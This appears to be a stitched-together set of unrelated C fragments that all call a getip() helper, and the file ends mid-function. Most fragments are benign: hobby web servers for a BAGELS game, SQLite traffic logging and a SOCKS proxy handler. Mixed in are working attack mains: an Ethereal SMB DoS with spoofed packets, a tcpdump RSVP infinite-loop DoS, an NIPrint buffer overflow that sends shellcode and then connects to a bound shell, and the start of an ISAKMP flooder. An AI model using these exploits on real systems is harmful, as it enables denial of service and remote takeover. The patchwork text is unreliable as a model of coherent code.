/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int daddr=0,saddr=0;
printf("\n[*] Ethereal <= 0.10.10 SMB DoS.\n[*] by Nicob (code ripped from vade79)\n\n");
if(argc<2) {
printf("[*] syntax: %s <dst host> [src host(0=random)]\n",
argv[0]);
printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2) {
if(strstr(argv[2],"nospoof"))nospoof=1;
else saddr=getip(argv[2]);
}
printf("[*] destination\t: %s\n",argv[1]);
if(!nospoof)
printf("[*] source\t: %s (spoofed)\n",(saddr?argv[2]:"<random>"));
else
printf("[*] source\t: real IP\n");
printf("[+] sending packet ...");
fflush(stdout);
srandom(time(0));
if(nospoof)nbt_nospoof(daddr);
else nbt_spoof(daddr,saddr);
printf(".");
fflush(stdout);
printf("\n[*] done.\n\n");
fflush(stdout);
exit(0);
}
/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int amt=DFL_AMOUNT;
unsigned int daddr=0,saddr=0;
printf("[*] tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop "
"DOS.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2)saddr=getip(argv[2]);
if(argc>3)amt=atoi(argv[3]);
if(!amt)printe("no packets?",1);
printf("[*] destination\t: %s\n",argv[1]);
if(!nospoof)
printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
printf("[*] amount\t: %u\n\n",amt);
printf("[+] sending(packet = .): ");
fflush(stdout);
while(amt--){
/* spice things up. */
srandom(time(0)+amt);
rsvp_spoof(daddr,saddr);
printf(".");
fflush(stdout);
usleep(50000);
}
printf("\n\n[*] done.\n");
fflush(stdout);
exit(0);
}
void sqlflow(const string &ss,long long liu,long long kai,long long tt) //向数据库写入流量信息
//ss是ID字符串,liu是流量,kai是起始时间,tt是终止时间
{
char **jieguo=NULL;
int hang=0,lie=0;
string mac=getmac(ss),ip=getip(ss);
yuju="SELECT * FROM flow WHERE mac='"+mac+"' AND ip='"+ip+"' AND ("+str(tt)+"-start<"+str(shezhi.pian)+");";
//查询语句,用于检查是否含有间隔小于时间片的记录
sqlf=sqlite3_get_table(db,yuju.c_str(),&jieguo,&hang,&lie,&sqlerr);
if (jieguo!=NULL)
sqlite3_free_table(jieguo);
sqlgeterr(sqlf);
if (!hang)//如果没有
{
yuju="INSERT INTO flow VALUES ('"+mac+"','"+ip+"',"+str(liu)+",'"+str(kai)+"','"+str(tt)+"');";
//插入语句,插入一条记录
sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
sqlgeterr(sqlf);
}
else
{
if (hang>1)
{
exit(-1);
}
yuju="UPDATE flow SET data=data+"+str(liu)+",end='"+str(tt)+"' WHERE mac='"+mac+"' AND ip='"+ip+"' AND (";
yuju+=str(tt)+"-start<"+str(shezhi.pian)+");";
//更新语句,更新间隔小于时间片的记录,最后,同一个IP MAC组合的每条记录间隔都大于时间片,期间的流量累加
sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
sqlgeterr(sqlf);
}
}
void handlesession(){ //handle a session once it's established
unsigned int rsize,strncmpval;
rsize=recv_size(); printf("**rsz=%d\n",rsize);
if (rsize>0){
thisip.l=getip();
if (recv0(buf,min(24,rsize))>0){ //get enough characters to distinguish the request
printf("%s\n",buf);
if (strncmp((char *)buf,"POST /",6)==0){
bagelsinit(); //initialize game, send the form
uptime+=311; //250ms allowed for initialization
}
else if (strncmp((char *)buf,"GET /favicon",12)==0){
sendnak(); //no favicon here
uptime+=100; //100ms allowed for nak
}
else if (strncmp((char *)buf,"GET /?G=",8)==0){
bagelsturn(); //give player his turn
uptime+=376; //200ms allowed for each turn
}
else if (strncmp((char *)buf,"GET /",5)==0){
bagelsinit(0); //initialize game, send the form
uptime+=311; //250ms allowed for initialization
}
else{
printf("\nmystery meat\n");
bagelsinit(0); //initialize game, send the form
uptime+=311; //250ms allowed for initialization
}
}
}
if (rsize>0) flush(rsize); //get rid of the received data
disconnect0(); //in any case, we're done here
printf("done\n>\n");
}
void bagelsinit(){
int sendrc;
static unsigned char hdr1[]="HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
"<html><body><span style=\"color:#0000A0\">\r\n"
"<center><h1>Olduino 1802 BAGELS Server</h1></center>";
static unsigned char Inst1[]=
"I AM THINKING OF A 3 DIGIT NUMBER.<BR>TRY TO GUESS " //50
"MY NUMBER AND I WILL GIVE YOU CLUES AS FOLLOWS:<BR>"
"...PICO - ONE DIGIT IS IN THE WRONG PLACE<BR>"
"...FERMI - ONE DIGIT IS IN THE CORRECT PLACE<BR>"
"...BAGELS - NO DIGIT IS CORRECT<P>";
static unsigned char gform[]="<p><form method=\"GET\">\r\n"
"<input type=\"text\" name=\"G\">"
"<input type=\"submit\" value=\"Enter Your Guess\">\r\n"
"</form>";
static unsigned char trlr[]="</body></html>\r\n\r\n";
int x=sizeof(trlr);
sendconst(hdr1); // Now Send the HTTP Response first part
printf("I.\n");
//sendconst(Inst1); // Now Send the instructions
send0(Inst1,sizeof(Inst1)-1); // Now Send the instructions
printf(".I\n");
sendconst(gform); // Now Send the rest of the page
sendlit("<a href=\"http://goo.gl/p4C0Cg\">Olduino</a>: An Arduino for the First of Us<p>");
sendconst(trlr); // Now Send the rest of the page
thisip.l=getip();
thisipslot=getipslot(thisip);//finds or assigns a slot for the ip
setsecret();
strcpy((char*)secrets[thisipslot],(char*)secret);
printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
void sqlspeed(const string &ss,long long liu,long long tt) //向数据库写入速度信息
//ss是ID串,liu是流量,tt是截止时间
{
yuju="INSERT INTO speed VALUES ('"+getmac(ss)+"','"+getip(ss)+"',"+str(liu/shezhi.jiange)+",'"+str(tt)+"')";
//插入语句,每次插入此IP MAC组合数据库更新间隔中的平均速度
sqlf=sqlite3_exec(db,yuju.c_str(),NULL,NULL,&sqlerr);
sqlgeterr(sqlf);
}
int main(){
freopen("host_list_10000","r",stdin);
char ip[16]="\0";
char *host="baidu.com\0";
getip(host,ip,0);
printf("ip=%s\n",ip);
freopen("host_list_10000","r",stdin);
char c[100];
int i=0;
for(;i<100;++i){
memset(c,0,sizeof(c));
gets(c);
memset(ip,0,sizeof(ip));
getip(c,ip,0);
printf("i=%d ip=%s\n",i+1,ip);
}
return 0;
}
int main(int argc, char **argv) {
#ifdef _WIN32
WSADATA wsaData;
#endif
int sock;
struct sockaddr_in sockstruct;
char tmp[2000];
if(!argv[1]) { printf("Usage: %s <address>\n",argv[0]);exit(0); }
#ifdef _WIN32
if(WSAStartup(0x101,&wsaData)){
printf("Unable to initialize WinSock lib.\n");
exit(0);
}
#endif
memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(argv[1]);
sockstruct.sin_port=htons(515);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("[+] Connected to %s:515!\n",argv[1]);
memset(tmp,0x00,sizeof tmp);
memset(tmp,0x41,49);
*(long *)&tmp[strlen(tmp)]=RET;
memset(tmp+strlen(tmp),0x90,50);
memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
send(sock,tmp,strlen(tmp),0);
printf("[+] Exploit code was sent!\n");
}
#ifdef _WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
printf("[+] Connecting to %s:%d\n",argv[1],SHELL);
sprintf(tmp,"telnet %s %d\n",argv[1],SHELL);
system(tmp);
printf("[-] Not connected! NIPrint probably not vulnerable!\n");
return 0;
}
void handlepost(){
if (ledmode==1){
ledmode=0;
asm(" req\n"); //Q led off
} else {
ledmode=1;
asm(" seq\n"); //Q led on
}
cmdip.l=getip();
sendform();
if (cmdip.l!=oldip.l){
printf("IP %d.%d.%d.%d\n",cmdip.c[0],cmdip.c[1],cmdip.c[2],cmdip.c[3]);
oldip.l=cmdip.l;
}
}
idworker::idworker()
{
char ip[100];
getip(ip,sizeof(ip));
uint64_t haship = BKDRHash(ip) % 31;
uint64_t pd = getpid();
uint64_t threadid = pthread_self();
uint64_t machine_id = ( pd << 2 | threadid ) % 31;
worker_id = ((haship << (workerIdBits - 5)) | machine_id) & (maxWorkerId) ;
sequence=0;
lastTimestamp=0;
//printf("hash(ip)=%llu, machine_id=%llu,worker_id=%llu\n",haship,machine_id,worker_id);
}
void bagelsinit(){
int sendrc;
games++;
pages++;
sendconst(hdr1a);send0s(itoa(pages,pnbuf)); sendconst(hdr1b); // Now Send the HTTP Response first part
sendconst(Inst1); // Now Send the instructions
sendconst(Inst2); // Now Finish the instructions
sendconst(gform); // Now Send the rest of the page
sendconst(olduinolink);
sendconst(trlr); // Now Send the trailer
thisip.l=getip();
thisipslot=getipslot(thisip);//finds or assigns a slot for the ip
setsecret();
strcpy((char*)secrets[thisipslot],(char*)secret);
printf("IP: %d.%d.%d.%d,slot %d,secret %s\n",
thisip.c[0],thisip.c[1],thisip.c[2],thisip.c[3],thisipslot,secrets[thisipslot]);
}
int connect_to_host(char * host, int port)
{
struct sockaddr_in s_in;
memset( &s_in, '\0', sizeof(struct sockaddr_in) );
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip( host );
s_in.sin_port = htons( port );
if ((sock = socket( AF_INET, SOCK_STREAM, 0 )) <= 0)
QUIT(ERR_CONN);
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)))
QUIT (ERR_CONN);
#ifdef SHITTEST
sleep(15);
#endif
fcntl(sock, F_SETFL, O_NONBLOCK);
return (sock);
}
static void recv4() {
int len;
int interface;
mh.msg_name=&sa4;
mh.msg_namelen=sizeof(sa4);
if ((len=recvmsg(s4,&mh,0))==-1) {
perror("recvmsg");
exit(3);
}
peer=(struct sockaddr*)&sa4;
sl=sizeof(sa4);
interface=v4if();
getip(interface);
handle(s4,buf,len,interface);
}
void handlesession() { //handle a session once it's established
unsigned int rsize,strncmpval;
unsigned int tries=10;
rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
while(rsize==0 && tries-->0) {
delay(20);
printf("re-size ");
rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
}
printf("**rsz=%d\n",rsize);
if (rsize>0) {
thisip.l=getip();
if (recv0(buf,min(16,rsize))>0) { //get enough characters to distinguish the request
printf("%s\n",buf);
if (strncmp((char *)buf,"POST /",6)==0) {
bagelsinit(); //initialize game, send the form
}
else if (strncmp((char *)buf,"GET /favicon",12)==0) {
sendfavicon();
}
else if (strncmp((char *)buf,"GET /bitmap",11)==0) {
sendbmp();
}
else if (strncmp((char *)buf,"GET /?G=",8)==0) {
bagelsturn(); //give player his turn
}
else if (strncmp((char *)buf,"GET /T",6)==0) {
bagelspeek(); //show the IP table
}
else if (strncmp((char *)buf,"GET /",5)==0) {
bagelsinit(0); //initialize game, send the form
}
else {
printf("\nmystery meat\n");
bagelsinit(0); //initialize game, send the form
}
}
}
printf("flushing %d\n",rsize);
if (rsize>0) flush(rsize); //get rid of the received data
wizCmd(CR_DISCON);// Disconnect the connection- we're done here
printf("done\n>\n");
sessions++;
}
int cgiMain()
{
char *filename = "ip_config.conf";
char ip[16];
unsigned short portt = 8887;
int fd;
int readnd = 0;
char buffer[512];
getip(filename, ip);
fd = tcp_init_client(ip, portt);
int passed, conditioner, mode;
struct replay_packet * replay;
struct common_packet request;
request.head.len = sizeof(request.data);
request.head.encrpyt = ENCRPYT_NO;
request.head.ki = KI_AIRCONDITIONER;
cgiHeaderContentType("text/html");
cgiFormInteger("conditioner", &conditioner, 0);
cgiFormInteger("mode", &mode, 0);
cgiFormInteger("passed", &passed, 0);
request.head.ttl = conditioner;
request.head.mo = mode;
request.head.extent = passed;
writen(fd, (void *)&request, sizeof(struct register_struct));
readnd = readn(fd, (void *)buffer, sizeof(struct replay_packet));
replay = (struct replay_packet *)buffer;
if (readnd == sizeof(struct replay_packet)) {
if (replay->head.ki == KI_REPLAY) {
fprintf(cgiOut, "conditioner=%d;statuss=%d", conditioner, replay->data);
}
}
tcp_close(fd);
return 0;
}
static void recv6() {
int len,interface;
mh.msg_name=&sa6;
mh.msg_namelen=sizeof(sa6);
if ((len=recvmsg(s6,&mh,0))==-1) {
perror("recvmsg");
exit(3);
}
peer=(struct sockaddr*)&sa6;
sl=sizeof(sa6);
if (IN6_IS_ADDR_V4MAPPED(sa6.sin6_addr.s6_addr))
interface=v4if();
else
interface=sa6.sin6_scope_id;
getip(interface);
handle(s6,buf,len,interface);
}
/* Connect to a host */
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
main()
{
long s;
char buf[MAX];
if (getip(&s)) {
inet_ntop(PF_INET, (void *)(&s), buf, MAX);
printf("my ip address is %s\n",buf);
}
/* struct hostent {
char *h_name;
char **h_aliases;
int h_addrtype;
int h_length;
char **h_addr_list;
}
*/
}
void handlesession(){ //handle a session once it's established
unsigned int rsize,strncmpval;
unsigned int tries=10;
rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
while(rsize==0 && tries-->0){
delay(20);
printf("re-size ");
rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
}
printf("**rsz=%d\n",rsize);
if (rsize>0){
sessip.l=getip();
if (recv0(buf,min(16,rsize))>0){ //get enough characters to distinguish the request
printf("%s\n",buf);
if (strncmp((char *)buf,"POST /",6)==0){
printf("\np\n");
handlepost(); //toggle LED, send the form
}
else if (strncmp((char *)buf,"GET /favicon",12)==0){
printf("\nf\n");
sendnak(); //no favicon here
}
else if (strncmp((char *)buf,"GET /",5)==0){
printf("\ng\n");
sendform(); //send the form
}
else{
printf("\nmystery meat\n%s\n",buf);
printf("IP %d.%d.%d.%d\n",sessip.c[0],sessip.c[1],sessip.c[2],sessip.c[3]);
send405(); //disallow oddball requests
}
}
printf("flushing %d\n",rsize);
if (rsize>0) flush(rsize); //get rid of the received data
}
printf("\nd\n");
wizCmd(CR_DISCON);// Disconnect the connection- we're done here
printf(">\n");
sessions++;
}
void getresp() { //handle a session once it's established
unsigned int rsize,strncmpval;
unsigned int tries=500;
printf("getting response\n");
rsize=wizGetCtl16(SnRX_RSR); //get the size of the received data
while(rsize==0 && tries-->0) {
delay(20);
printf("re-size ");
rsize=wizGetCtl16(SnRX_RSR); //retry size of the received data
}
printf("**rsz=%d\n",rsize);
if (rsize>0) {
thisip.l=getip();
if (recv0(buf,min(1023,rsize))>0) { //get some characters
printf("%s\n",buf);
}
}
printf("flushing %d\n",rsize);
if (rsize>0) flush(rsize); //get rid of the received data
wizCmd(CR_DISCON);// Disconnect the connection- we're done here
printf("done\n>\n");
}
static int
setfs(struct sockaddr_in *addr, char *path, char *p,
const struct in_addr *siaddr)
{
if (getip(&p, &addr->sin_addr) == 0) {
if (siaddr != NULL && *p == '/')
bcopy(siaddr, &addr->sin_addr, sizeof(struct in_addr));
else
return 0;
} else {
if (*p != ':')
return 0;
p++;
}
addr->sin_len = sizeof(struct sockaddr_in);
addr->sin_family = AF_INET;
strlcpy(path, p, MNAMELEN);
return 1;
}
/** PASV command */
void ftp_pasv(Command *cmd, State *state)
{
if(state->logged_in){
int ip[4];
int port;
char buff[255];
char *response = "227 Entering Passive Mode (%d,%d,%d,%d,%d,%d)\n";
port = gen_port();
getip(state->connection,ip);
/* Close previous passive socket? */
close(state->sock_pasv);
/* Start listening here, but don't accept the connection */
state->sock_pasv = create_socket(port);
printf("port: %d\n",port);
sprintf(buff,response,ip[0],ip[1],ip[2],ip[3],port>>8,port&0xff);
state->message = buff;
state->mode = SERVER;
puts(state->message);
}else{
void * sockschild(struct clientparam* param) {
int res;
unsigned i=0;
SOCKET s;
unsigned size;
SASIZETYPE sasize;
unsigned char * buf=NULL;
unsigned char c;
unsigned char command=0;
struct pollfd fds[3];
int ver=0;
int havepass = 0;
struct sockaddr_in sin;
int len;
param->req.sin_addr.s_addr = 0;
param->service = S_SOCKS;
if(!(buf = myalloc(BUFSIZE))) {RETURN(21);}
memset(buf, 0, BUFSIZE);
if ((ver = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5 && ver != 4) {
RETURN(401);
} /* version */
param->service = ver;
if(ver == 5){
if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(441);} /* nmethods */
for (; i; i--) {
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(442);}
if (res == 2 && !param->srv->nouser) {
havepass = res;
}
}
buf[0] = 5;
buf[1] = havepass;
if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
if (havepass) {
if (((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0))) != 1) {
RETURN(412);
}
if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(443);}
if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(444);};
buf[i] = 0;
if(!param->username)param->username = (unsigned char *)mystrdup((char *)buf);
if ((i = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(445);}
if (i && (unsigned)(res = sockgetlinebuf(param, CLIENT, buf, i, 0, conf.timeouts[STRING_S])) != i){RETURN(446);};
buf[i] = 0;
if(!param->password)param->password = (unsigned char *)mystrdup((char *)buf);
buf[0] = 1;
buf[1] = 0;
if(socksend(param->clisock, buf, 2, conf.timeouts[STRING_S])!=2){RETURN(402);}
}
if ((c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_L], 0)) != 5) {
RETURN(421);
} /* version */
}
if( (command = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) < 1 || command > 3){command = 0; RETURN(407);} /* command */
if(ver == 5){
if (sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0) == EOF) {RETURN(447);} /* reserved */
c = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0); /* atype */
}
else {
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(448);}
buf[0] = (unsigned char) res;
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(449);}
buf[1] = (unsigned char) res;
param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
c = 1;
}
switch(c) {
case 1:
for (i = 0; i<4; i++){
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(450);}
buf[i] = (unsigned char)res;
}
param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = *(unsigned long *)buf;
if(command==1 && !param->req.sin_addr.s_addr) {
RETURN(422);
}
myinet_ntoa(param->sins.sin_addr, (char *)buf);
break;
case 3:
if ((size = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(451);} /* nmethods */
for (i=0; i<size; i++){ /* size < 256 */
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(452);}
buf[i] = (unsigned char)res;
}
buf[i] = 0;
param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
if(command==1 && !param->req.sin_addr.s_addr) {
RETURN(100);
}
break;
default:
RETURN(998);
}
if(param->hostname)myfree(param->hostname);
param->hostname = (unsigned char *)mystrdup((char *)buf);
if (ver == 5) {
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(453);}
buf[0] = (unsigned char) res;
if ((res = sockgetcharcli(param, conf.timeouts[SINGLEBYTE_S], 0)) == EOF) {RETURN(454);}
buf[1] = (unsigned char) res;
param->sins.sin_port = param->req.sin_port = *(unsigned short*)buf;
}
else {
sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
buf[127] = 0;
if(!param->srv->nouser && *buf && !param->username)param->username = (unsigned char *)mystrdup((char *)buf);
if(param->sins.sin_addr.s_addr && ntohl(param->sins.sin_addr.s_addr)<256){
param->service = S_SOCKS45;
sockgetlinebuf(param, CLIENT, buf, BUFSIZE - 1, 0, conf.timeouts[STRING_S]);
buf[127] = 0;
if(param->hostname)myfree(param->hostname);
param->hostname = (unsigned char *)mystrdup((char *)buf);
param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr = getip(buf);
}
}
if(command == 1 && !param->req.sin_port) {RETURN(424);}
param->sins.sin_family = AF_INET;
switch(command) {
case 1:
param->operation = CONNECT;
break;
case 2:
param->sins.sin_addr.s_addr = param->extip;
param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
if ((param->remsock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {RETURN (11);}
param->operation = BIND;
break;
case 3:
param->sins.sin_port = param->extport?param->extport:param->req.sin_port;
param->sins.sin_addr.s_addr = param->extip;
if ((param->remsock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) {RETURN (11);}
param->operation = UDPASSOC;
break;
default:
RETURN(997);
}
if((res = (*param->srv->authfunc)(param))) {RETURN(res);}
if(command > 1) {
if(bind(param->remsock,(struct sockaddr *)¶m->sins,sizeof(param->sins))) {
param->sins.sin_port = 0;
if(bind(param->remsock,(struct sockaddr *)¶m->sins,sizeof(param->sins)))RETURN (12);
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with server\n",
inet_ntoa(param->sins.sin_addr),
ntohs(param->sins.sin_port)
);
fflush(stderr);
#endif
}
sasize = sizeof(struct sockaddr_in);
getsockname(param->remsock, (struct sockaddr *)¶m->sins, &sasize);
if(command == 3) {
param->ctrlsock = param->clisock;
param->clisock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(param->clisock == INVALID_SOCKET) {RETURN(11);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = param->srv->intip;
sin.sin_port = htons(0);
if(bind(param->clisock,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))) {RETURN (12);}
#if SOCKSTRACE > 0
fprintf(stderr, "%s:%hu binded to communicate with client\n",
inet_ntoa(sin.sin_addr),
ntohs(sin.sin_port)
);
fflush(stderr);
#endif
}
}
param->res = 0;
CLEANRET:
if(param->clisock != INVALID_SOCKET){
sasize = sizeof(struct sockaddr_in);
if(command != 3) getsockname(param->remsock, (struct sockaddr *)&sin, &sasize);
else getsockname(param->clisock, (struct sockaddr *)&sin, &sasize);
#if SOCKSTRACE > 0
fprintf(stderr, "Sending confirmation to client with code %d for %s with %s:%hu\n",
param->res,
commands[command],
inet_ntoa(sin.sin_addr),
ntohs(sin.sin_port)
);
fflush(stderr);
#endif
if(ver == 5){
buf[0] = 5;
buf[1] = param->res%10;
buf[2] = 0;
buf[3] = 1;
memcpy(buf+4, &sin.sin_addr.s_addr, 4);
memcpy(buf+8, &sin.sin_port, 2);
socksend((command == 3)?param->ctrlsock:param->clisock, buf, 10, conf.timeouts[STRING_S]);
}
else{
buf[0] = 0;
buf[1] = 90 + (param->res%10);
memcpy(buf+2, &sin.sin_port, 2);
memcpy(buf+4, &sin.sin_addr.s_addr, 4);
socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
}
if (param->res == 0) {
switch(command) {
case 1:
if(param->redirectfunc){
if(buf)myfree(buf);
return (*param->redirectfunc)(param);
}
param->res = sockmap(param, conf.timeouts[CONNECTION_L]);
break;
case 2:
listen (param->remsock, 1);
fds[0].fd = param->remsock;
fds[1].fd = param->clisock;
fds[0].events = fds[1].events = POLLIN;
res = poll(fds, 2, conf.timeouts[(param->req.sin_addr.s_addr)?CONNECTION_S:CONNECTION_L] * 1000);
if (res < 1 || fds[1].revents) {
res = 460;
break;
}
sasize = sizeof(param->sins);
s = accept(param->remsock, (struct sockaddr *)¶m->sins, &sasize);
closesocket(param->remsock);
param->remsock = s;
if(s == INVALID_SOCKET) {
param->res = 462;
break;
}
if(param->req.sin_addr.s_addr && param->req.sin_addr.s_addr != param->sins.sin_addr.s_addr) {
param->res = 470;
break;
}
#if SOCKSTRACE > 0
fprintf(stderr, "Sending incoming connection to client with code %d for %s with %s:%hu\n",
param->res,
commands[command],
inet_ntoa(param->sins.sin_addr),
ntohs(param->sins.sin_port)
);
fflush(stderr);
#endif
if(ver == 5){
memcpy (buf+4, ¶m->sins.sin_addr, 4);
memcpy (buf+8, ¶m->sins.sin_port, 2);
socksend(param->clisock, buf, 10, conf.timeouts[STRING_S]);
}
else {
memcpy (buf+2, ¶m->sins.sin_port, 2);
memcpy (buf+4, ¶m->sins.sin_addr, 4);
socksend(param->clisock, buf, 8, conf.timeouts[STRING_S]);
}
param->res = sockmap(param, conf.timeouts[CONNECTION_S]);
break;
case 3:
param->sins.sin_addr.s_addr = param->req.sin_addr.s_addr;
param->sins.sin_port = param->req.sin_port;
myfree(buf);
if(!(buf = myalloc(LARGEBUFSIZE))) {RETURN(21);}
for(;;){
fds[0].fd = param->remsock;
fds[1].fd = param->clisock;
fds[2].fd = param->ctrlsock;
fds[2].events = fds[1].events = fds[0].events = POLLIN;
res = poll(fds, 3, conf.timeouts[CONNECTION_L]*1000);
if(res <= 0) {
param->res = 463;
break;
}
if (fds[2].revents) {
param->res = 0;
break;
}
if (fds[1].revents) {
sasize = sizeof(struct sockaddr_in);
if((len = recvfrom(param->clisock, buf, 65535, 0, (struct sockaddr *)&sin, &sasize)) <= 10) {
param->res = 464;
break;
}
if(sin.sin_addr.s_addr != param->sinc.sin_addr.s_addr){
param->res = 465;
break;
}
if(buf[0] || buf[1] || buf[2]) {
param->res = 466;
break;
}
switch(buf[3]) {
case 1:
i = 8;
memcpy(¶m->sins.sin_addr.s_addr, buf+4, 4);
break;
case 3:
size = buf[4];
for (i=4; size; i++, size--){
buf[i] = buf[i+1];
}
buf[i++] = 0;
param->sins.sin_addr.s_addr = getip(buf+4);
break;
default:
RETURN(996);
}
memcpy(¶m->sins.sin_port, buf+i, 2);
i+=2;
sasize = sizeof(param->sins);
if(len > (int)i){
if(socksendto(param->remsock, ¶m->sins, buf+i, len - i, conf.timeouts[SINGLEBYTE_L]*1000) <= 0){
param->res = 467;
break;
}
param->statscli+=(len - i);
param->nwrites++;
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed from client to %s:%hu size %d, header %d\n",
inet_ntoa(param->sins.sin_addr),
ntohs(param->sins.sin_port),
(len - i),
i
);
fprintf(stderr, "client address is assumed to be %s:%hu\n",
inet_ntoa(sin.sin_addr),
ntohs(sin.sin_port)
);
fflush(stderr);
#endif
}
}
if (fds[0].revents) {
struct sockaddr_in tsin;
sasize = sizeof(tsin);
buf[0]=buf[1]=buf[2]=0;
buf[3]=1;
if((len = recvfrom(param->remsock, buf+10, 65535 - 10, 0, (struct sockaddr *)&tsin, &sasize)) <= 0) {
param->res = 468;
break;
}
param->statssrv+=len;
param->nreads++;
memcpy(buf+4, &tsin.sin_addr.s_addr, 4);
memcpy(buf+8, &tsin.sin_port, 2);
sasize = sizeof(param->sins);
if(socksendto(param->clisock, &sin, buf, len + 10, conf.timeouts[SINGLEBYTE_L]*1000) <=0){
param->res = 469;
break;
}
#if SOCKSTRACE > 1
fprintf(stderr, "UDP packet relayed to client from %s:%hu size %d\n",
inet_ntoa(tsin.sin_addr),
ntohs(tsin.sin_port),
len
);
fflush(stderr);
#endif
}
}
break;
default:
param->res = 417;
break;
}
}
}
if(command > 3) command = 0;
if(buf){
sprintf((char *)buf, "%s ", commands[command]);
if(param->hostname){
sprintf((char *)buf + strlen((char *)buf), "%.265s", param->hostname);
}
else myinet_ntoa(param->req.sin_addr, (char *)buf+strlen((char *)buf));
sprintf((char *)buf+strlen((char *)buf), ":%hu", ntohs(param->req.sin_port));
(*param->srv->logfunc)(param, buf);
myfree(buf);
}
freeparam(param);
return (NULL);
}
int main(int argc, char **argv){
char *version = "0.3a";
u_long source, destination;
int lineopt,
port = 0,
nb,
nbs = 1,
loop = 0,
number = 0,
pkt_len,
src_ok = 0,
dst_ok = 0,
length = 0;
printf("--- nb-isakmp.c v.%s / Nelson Brito / Independent Security Consultant ---\n", version);
(argc < 4) ? usage(argv[0]) : (char *)NULL;
signal(SIGHUP, SIG_IGN);
signal(SIGINT, u_abort);
signal(SIGTERM, u_abort);
signal(SIGKILL, u_abort);
signal(SIGQUIT, u_abort);
while(1){
static struct option my_opt[]={
{"source", 1, 0, 's'},
{"destination", 1, 0, 'd'},
{"port", 1, 0, 'p'},
{"number", 1, 0, 'n'},
{"length", 1, 0, 'l'},
{"loop", 0, 0, 'L'},
{"help", 0, 0, 'h'},
{0, 0, 0, 0}
};
int option_index = 0;
lineopt = getopt_long(argc, argv, "s:d:p:n:l:Lh", my_opt, &option_index);
if(lineopt == -1) break;
switch(lineopt){
case 's':
source = getip(optarg); src_ok =1; break;
case 'd':
destination = getip(optarg); dst_ok = 1; break;
case 'p':
